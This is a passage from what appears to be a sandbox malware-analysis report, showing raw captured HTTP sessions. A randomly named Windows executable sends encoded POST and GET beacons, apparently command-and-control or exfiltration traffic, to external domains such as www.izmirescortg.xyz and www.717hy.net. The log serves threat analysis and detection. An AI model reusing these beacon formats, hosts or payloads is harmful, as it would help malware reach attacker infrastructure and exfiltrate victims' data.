55 61 64 70 6b 55 4a 49 6c 65 6b 44 55 4e 57 56 [TRUNCATED]
                                                                            Data Ascii: GX6Lp2F=kqa2EAJEmVzzKRPHZEP/4wxW+UfXBOqwllngBpyEUD7Ot/JGtu1Bau7EvoP3246lW5+0Bv+4pa8j+2CixQ0FEQqgOCk7mT3a7AAP/HFmt24BVoA1IxMo4OJPbfnjvogrrJWqYcovOdhH+/Hzyv389k71y6rl0+g6QMD32g8IT6H4LLVCw8KYq6+xyVsdxP+4yXD4vIi/vfYDvvoNlmb0+PvZjs2JrJ6Y1QPHx7mqYpPC0awgQV0SwpXu0pKm9Icf+dpX3hJrKjwhsgBcDQiKnhXhIVQhnaWyGV1QyXN/n24W9nJ8OcSymcvZJAUadpkUJIlekDUNWVnSod8GtF5bS5+UQVjFaQByhjSTAQzuk25Uc6QG/BPtuhLhBfM+bu8V0qLgKVx0r7b9ZN5GLhL555Ip85ZEOpZPSX2qwKjKYKWXrY80cOfHZ5SSwCXMpcaoViBK0awJ8hC3lCd8q3aZEExq94lzdPiTRQ1nG+ek5jwLefV2vrKhls/5i68WGle+iJ6fWkminDXxvEHrhn+a3L1iQWNP32cZollvqYb0M51PkAkG4g2MhVdBx0YXD1nNFq7oytgjnrAWXYWhd6pAYJIof70MBai60qVsb4XSd3eKqq65l8NrbubZitn9poor6VCAUyN4nf9tcDmISXXqXhY9J436yoRErrcYmPJYusKxjlrt7Y1H7HjdyZ6ypRxmQr/CrZbnuiXu/CAmz7rHlO8adyf47eGUa49KdtoUrDOefymAEELwGwu964jR4s50OYeQnPjyAK87QUb+LMldnsgSenFmWKuofUsZr+7j5bijs1QPomeQtFfodLjPZZRzvzZKyRrJhKVa/8wqcVCAUj5NVxKQi0rzfQVosMZ3iEmoOfnScNUl/q3kMA4sIXLtUzvBiMDoAVJvVEgTjaes8oRcsGPQD1r77DCl2srroDqSCWkV7BycZV6SNbnEWXuujJlHMHIvYOnQ0+G+7LFWAm6ME2VDQinyRNgAwVj4wLBM [TRUNCATED]
                                                                            Nov 24, 2024 08:25:02.505578041 CET1159INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 796
                                                                            date: Sun, 24 Nov 2024 07:25:02 GMT
                                                                            server: LiteSpeed
                                                                            strict-transport-security: max-age=63072000; includeSubDomains
                                                                            x-frame-options: SAMEORIGIN
                                                                            x-content-type-options: nosniff
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            44192.168.2.105002568.66.226.92804764C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 24, 2024 08:25:03.934626102 CET419OUTGET /bokt/?GX6Lp2F=poyWHxU0sXOGQX6eVUDBw1lp5X+IA5CiyB6gAIqfCj73s4Aj6MIiBsrDm9nDs7uyJKeVN/2spsRHx0Xh4EIWPHPhLhUxqk/k6TQj/zpRoAwTN6gmaA==&H8=BpFD-28hKhrD HTTP/1.1
                                                                            Host: www.717hy.net
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Nov 24, 2024 08:25:05.179421902 CET1159INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 796
                                                                            date: Sun, 24 Nov 2024 07:25:04 GMT
                                                                            server: LiteSpeed
                                                                            strict-transport-security: max-age=63072000; includeSubDomains
                                                                            x-frame-options: SAMEORIGIN
                                                                            x-content-type-options: nosniff
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            45192.168.2.1050026172.67.186.192804764C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 24, 2024 08:25:10.737601042 CET694OUTPOST /cxxv/ HTTP/1.1
                                                                            Host: www.izmirescortg.xyz
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.izmirescortg.xyz
                                                                            Content-Length: 196
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.izmirescortg.xyz/cxxv/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Raw: 47 58 36 4c 70 32 46 3d 53 47 4b 63 6f 45 57 42 73 6b 43 41 64 52 39 4a 2f 33 6b 42 36 5a 4f 35 45 49 44 55 42 59 35 56 67 62 53 38 2b 48 32 67 4e 39 66 6c 53 31 57 69 38 42 6e 76 6e 64 4a 42 4e 5a 56 4b 53 72 49 69 72 39 2b 38 63 50 4c 73 4c 6a 68 64 47 32 57 58 32 72 6f 59 71 6a 41 4e 62 59 2b 75 33 4a 41 77 44 2b 38 30 4a 38 43 6a 4e 4c 45 4c 44 4f 57 39 59 44 6a 6f 73 61 4a 4a 44 37 71 6e 5a 71 56 59 52 73 46 38 4e 4e 45 57 61 75 38 6b 37 75 52 54 6e 35 55 7a 47 45 4a 4f 6d 7a 46 68 2b 55 2b 30 4b 54 6f 66 32 4f 48 55 32 31 72 68 78 4f 4f 6a 65 37 6f 4c 2b 75 64 6e 77 62 52 63
                                                                            Data Ascii: GX6Lp2F=SGKcoEWBskCAdR9J/3kB6ZO5EIDUBY5VgbS8+H2gN9flS1Wi8BnvndJBNZVKSrIir9+8cPLsLjhdG2WX2roYqjANbY+u3JAwD+80J8CjNLELDOW9YDjosaJJD7qnZqVYRsF8NNEWau8k7uRTn5UzGEJOmzFh+U+0KTof2OHU21rhxOOje7oL+udnwbRc
                                                                            Nov 24, 2024 08:25:11.992429972 CET1066INHTTP/1.1 404 Not Found
                                                                            Date: Sun, 24 Nov 2024 07:25:11 GMT
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ucg2Xsi5P7ooaC9F%2BKPYiH20vHxgRauK%2BUnIPS%2FrURGRdHRJxup9d2t%2BtBUrQFO%2F5Z6%2Fkqsw%2Fu6B9vSELzNhmAyJkVbJyN0DdNufKjJImqUYTZuE3KbnQ4jIu0fVTjjCo6cs9P4xDQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8e77a9e3c8947291-EWR
                                                                            Content-Encoding: gzip
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1805&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=694&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 65 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 54 90 c1 6e c2 30 10 44 ef f9 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 98 4a 6d af b3 6f 76 67 56 dd 95 af cb e6 7d 57 61 dd bc d4 d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: eaTn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(bY<;0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            46192.168.2.1050027172.67.186.192804764C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 24, 2024 08:25:13.410346985 CET718OUTPOST /cxxv/ HTTP/1.1
                                                                            Host: www.izmirescortg.xyz
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.izmirescortg.xyz
                                                                            Content-Length: 220
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.izmirescortg.xyz/cxxv/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Raw: 47 58 36 4c 70 32 46 3d 53 47 4b 63 6f 45 57 42 73 6b 43 41 63 7a 70 4a 2b 55 4d 42 7a 5a 4f 2b 59 59 44 55 4c 34 35 52 67 62 65 38 2b 47 79 4b 4e 4c 6e 6c 63 77 71 69 39 44 66 76 6b 64 4a 42 48 35 56 4c 4e 37 49 35 72 39 79 30 63 4b 72 73 4c 6e 42 64 47 33 6d 58 32 63 30 62 71 7a 41 4c 54 34 2b 67 36 70 41 77 44 2b 38 30 4a 38 47 46 4e 4c 73 4c 44 2f 6d 39 4b 51 37 72 77 71 4a 47 45 37 71 6e 4b 36 56 63 52 73 45 70 4e 50 77 73 61 74 49 6b 37 74 46 54 6e 72 77 30 4e 45 4a 55 34 44 45 49 32 68 62 65 45 41 59 6d 70 65 66 6e 6a 44 50 31 32 76 7a 6b 50 71 4a 63 74 5a 42 70 2b 64 6b 32 77 56 6c 65 38 38 74 62 67 2f 65 33 55 6c 39 39 76 58 78 78 54 41 3d 3d
                                                                            Data Ascii: GX6Lp2F=SGKcoEWBskCAczpJ+UMBzZO+YYDUL45Rgbe8+GyKNLnlcwqi9DfvkdJBH5VLN7I5r9y0cKrsLnBdG3mX2c0bqzALT4+g6pAwD+80J8GFNLsLD/m9KQ7rwqJGE7qnK6VcRsEpNPwsatIk7tFTnrw0NEJU4DEI2hbeEAYmpefnjDP12vzkPqJctZBp+dk2wVle88tbg/e3Ul99vXxxTA==
                                                                            Nov 24, 2024 08:25:14.748753071 CET1064INHTTP/1.1 404 Not Found
                                                                            Date: Sun, 24 Nov 2024 07:25:14 GMT
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iVgdUfRKAi8K4pE46ZEoIFJqiYcPB8hm%2BIlyP8CkeMZOH7PHSE2W%2FhGA1y%2F98gr%2Bt6mcymguZ8gzoHxDxPCa2NrlffQKXVj8bg60GNO9qsLfULohGy7qA2u8vjmi%2FTOVGWt%2BKGvKQw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8e77a9f5093f0c90-EWR
                                                                            Content-Encoding: gzip
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1447&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=718&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 65 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 54 90 c1 6e c2 30 10 44 ef f9 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 98 4a 6d af b3 6f 76 67 56 dd 95 af cb e6 7d 57 61 dd bc d4 d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: eaTn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(bY<;0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            47192.168.2.1050028172.67.186.192804764C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 24, 2024 08:25:16.102524996 CET1731OUTPOST /cxxv/ HTTP/1.1
                                                                            Host: www.izmirescortg.xyz
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.izmirescortg.xyz
                                                                            Content-Length: 1232
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.izmirescortg.xyz/cxxv/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Raw: 47 58 36 4c 70 32 46 3d 53 47 4b 63 6f 45 57 42 73 6b 43 41 63 7a 70 4a 2b 55 4d 42 7a 5a 4f 2b 59 59 44 55 4c 34 35 52 67 62 65 38 2b 47 79 4b 4e 4c 76 6c 63 43 53 69 38 6b 4c 76 6c 64 4a 42 45 35 56 57 4e 37 49 34 72 39 71 77 63 4b 32 58 4c 6c 35 64 48 52 53 58 39 49 41 62 6c 7a 41 4c 66 59 2b 68 33 4a 41 41 44 2b 73 77 4a 39 32 46 4e 4c 73 4c 44 38 4f 39 4a 44 6a 72 79 71 4a 4a 44 37 71 56 5a 71 56 6b 52 73 38 35 4e 50 6b 47 61 2b 51 6b 37 4e 56 54 6b 59 55 30 41 45 4a 53 35 44 45 51 32 68 66 46 45 42 30 45 70 64 44 64 6a 45 6a 31 7a 36 47 36 57 59 64 65 76 35 52 30 69 75 6f 48 79 69 70 4d 79 2f 73 5a 76 61 4f 2f 4a 56 38 50 6e 45 63 6b 51 38 7a 35 62 52 37 6e 67 31 78 56 33 59 61 64 57 77 6d 67 54 42 68 6d 32 63 67 34 47 61 4a 49 71 79 68 70 61 77 4b 77 75 4d 42 55 56 68 77 35 75 68 7a 36 30 73 34 42 67 74 32 71 31 55 74 33 35 6a 48 4c 45 39 43 49 34 58 65 41 78 34 68 73 34 64 47 49 62 6a 33 46 6f 41 64 56 38 43 4a 79 33 62 47 4c 7a 31 7a 69 41 72 46 77 48 58 33 75 72 70 75 47 41 71 55 65 64 6a [TRUNCATED]
                                                                            Data Ascii: GX6Lp2F=SGKcoEWBskCAczpJ+UMBzZO+YYDUL45Rgbe8+GyKNLvlcCSi8kLvldJBE5VWN7I4r9qwcK2XLl5dHRSX9IAblzALfY+h3JAAD+swJ92FNLsLD8O9JDjryqJJD7qVZqVkRs85NPkGa+Qk7NVTkYU0AEJS5DEQ2hfFEB0EpdDdjEj1z6G6WYdev5R0iuoHyipMy/sZvaO/JV8PnEckQ8z5bR7ng1xV3YadWwmgTBhm2cg4GaJIqyhpawKwuMBUVhw5uhz60s4Bgt2q1Ut35jHLE9CI4XeAx4hs4dGIbj3FoAdV8CJy3bGLz1ziArFwHX3urpuGAqUedjFe/qKV0Gk9AnBzIgZpd6B8MZUXJ2DXGWPWH21Ut9+yosiM9yf/ju1Ro+2ouGgpWKwEmRhFJ8wUYexyjlvZeikJoYXH6neZmNFvnaUvKiixLg7EcLXLMzXcDiaKvpjKooJ0Vs+Sz2NGkEzNPgdgEW2aEyFZ6o97UQX+TiDIepvVMpJmrJs8ARMC872TpGW8IDdRFzKfD9Le0Lir1WtiHzQ3nfMHqTxPFoABytP+Gc2mGDzRJcNIy7/CnKKw+o64B/UDMf21o5JpzY+YgY9rm8AEu60pW2W6FZYln9XF0kcQZ0ReUamtySuDFFcvTY0/fZPGs52V+nCB+oS6YJhMranPcByu3e03Thzko4YV8F2DUKSlvXmPZ3D8R+ZjC5eUjj5SwW5hzqCXk8ueldA7ERzr2ql1ce6TXFXy6s609wtEIHyxfQGKrDGpJ0JThdonl0eyQsivZw2N5IB2KYwutICfzh4bX568FJFLA2HW3+v1w3BB1Q0Xm7wbsBf+7kGVrwt23UH/C8VX86bpbvi3YOq2pMnb8zsXVdnO9UdA/FJsN+b/RV8095fuHhwjr/hfFjSkfHE3FdAgzgtW3nyptOGQunurQAArSf7ySb3F4MaaYlsbjaFKcQCQ6VzzAqZUfLcspN6iKqeen2F9aB0rtHseevfIr1DHBHWF [TRUNCATED]
                                                                            Nov 24, 2024 08:25:17.469991922 CET1064INHTTP/1.1 404 Not Found
                                                                            Date: Sun, 24 Nov 2024 07:25:17 GMT
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fexONy%2Bob8N63dYQRWbXx8Ca4d62lIxKAfR4uX7H2GjwdH1u445ulTczFMmDoQUFm48ywJX3yH9AQJ8Xsw1bJBUc%2F2NGKbPZj%2BYChPH03l3FcWm2uH2ZhlWqT4gbqQ9Pdd7x1rFOMA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8e77aa05f9ce4210-EWR
                                                                            Content-Encoding: gzip
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1566&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1731&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a 65 62 0d 0a 54 90 c1 6e c2 30 10 44 ef f9 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 98 4a 6d af b3 6f 76 67 56 dd 95 af cb e6 7d 57 61 dd bc d4 d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: febTn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(Y<;0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            48192.168.2.1050029172.67.186.192804764C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 24, 2024 08:25:19.649274111 CET426OUTGET /cxxv/?H8=BpFD-28hKhrD&GX6Lp2F=fEi8rzaYrE/XGRR50VEK8uqDXr7AK/1Kw/XUmUqnafTsdiSkrhbsiNoZNrJqJtIqpPiDC/W6aTtfGFbS6ow8ixkLbruB9JsRPd8yCP6sEcEmGu+VbQ== HTTP/1.1
                                                                            Host: www.izmirescortg.xyz
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Nov 24, 2024 08:25:20.158279896 CET1108INHTTP/1.1 404 Not Found
                                                                            Date: Sun, 24 Nov 2024 07:25:20 GMT
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QIBk17vPXbDECxtpzTCXTjUW6BZ7IaOe6646%2Bz0Rzdkumw10X%2BR%2FN3XoZDFOZpYWjY3uB6EbYq%2BUpF5SM3EVAXcqg3h22CJ%2FtWQzav437hw2pm%2BPIwdrn9smBJmjq%2FNyO7qHkSpGrg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8e77aa16cad4c47f-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1698&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=426&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 